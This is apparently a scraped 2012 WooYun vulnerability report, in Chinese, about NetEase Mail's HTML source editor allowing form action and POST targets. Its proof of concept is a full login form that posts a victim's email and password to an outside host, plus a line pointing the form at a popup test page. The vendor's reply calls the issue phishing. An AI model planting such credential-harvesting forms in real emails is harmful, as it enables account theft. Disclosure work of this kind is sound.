网易邮箱源码编辑未屏蔽ACTION与POST值导致的跨站

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010361

漏洞标题：网易邮箱源码编辑未屏蔽ACTION与POST值导致的跨站

漏洞作者： saviour

提交时间：2012-07-30 14:54

修复时间：2012-09-13 14:55

公开时间：2012-09-13 14:55

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-07-30：细节已通知厂商并且等待厂商处理中
2012-08-02：厂商已经确认，细节仅向厂商公开
2012-08-12：细节向核心白帽子及相关领域专家公开
2012-08-22：细节向普通白帽子公开
2012-09-01：细节向实习白帽子公开
2012-09-13：细节向公众公开

简要描述：

网易邮箱源码编辑未禁用ACTION与POST值导致的跨站

详细说明：

网易邮箱源码编辑未屏蔽ACTION与POST值导致的跨站不排除别的什么原因
可以导致传播恶意代码恶意广告钓鱼盗取帐号等行为

漏洞证明：

通过构造一个表单可以实现跨站远程登录
例子一：提交表单

<form action="http://www.wooyun.org/user.php?action=login&do=login" method="POST">	
	<div class="content">
		<table class="formTable">
			<tbody>
				<tr>
					<th width="100">E-mail：</th>
					<td><input type="text" name="email" value="" style="width:150px" /></td>
				</tr>
				<tr>
					<th>密码：</th>
					<td><input type="password" name="password" style="width:150px" />&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.wooyun.org/user.php?action=findpassword">忘记密码</a></td>
				</tr>
				<tr>
				<tr>
					<th>验证码：</th>
					<td><input type="text" name="captcha" style="width:80px" />&nbsp;<img onclick="this.src='http://www.wooyun.org/captcha.php?'+Math.random()" style="width:65px;height:18px;cursor:pointer" src="http://www.wooyun.org/captcha.php" /></td>
				</tr>
				<tr>
					<th>&nbsp;</th>
					<td><input type="submit" value="登录"/></td>
					<td><input type="hidden" value="123456"/></td>
				</tr>
			</tbody>
		</table>
	</div>
</form>

我想大家看到了吧可以提交POST 执行ACTION 如何提交的页面是攻击者有意编辑的那么你提交的帐号密码通通被别人盗取希望你们的邮箱里没什么重要信息
例子二：来个恶意弹窗

<form action="http://www.wooyun.org/user.php?action=login&do=login" method="POST">
直接把要执行的页面 换成我的弹窗网址 就可以了
<form action="http://www.cnproxy.com/popkillertest/test12.html" method="POST">

OK 我这里直接点登录就行了
弹弹弹弹出许多框哈哈

看到弹窗了吧以上仅为测试效果大家看到了吧如果对方是个挂马页面或是别的什么的我觉得你就会“暴露”了！
接下来我给大家坐下对比哦跟QQ邮箱吧

QQ邮箱直接屏蔽

修复方案：

网易亲我讲的明白了吧嘻嘻

版权声明：转载请注明来源 saviour@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2012-08-02 18:48

厂商回复：

感谢您对网易的关注，该问题非系统漏洞，属钓鱼型，已经进行相应处理。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010361

漏洞标题：网易邮箱源码编辑未屏蔽ACTION与POST值导致的跨站

相关厂商：网易

漏洞作者： saviour

提交时间：2012-07-30 14:54

修复时间：2012-09-13 14:55

公开时间：2012-09-13 14:55

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 saviour@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-010361

漏洞标题：网易邮箱源码编辑未屏蔽ACTION与POST值导致的跨站

相关厂商：网易

漏洞作者： saviour

提交时间：2012-07-30 14:54

修复时间：2012-09-13 14:55

公开时间：2012-09-13 14:55

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-010361"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 saviour@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：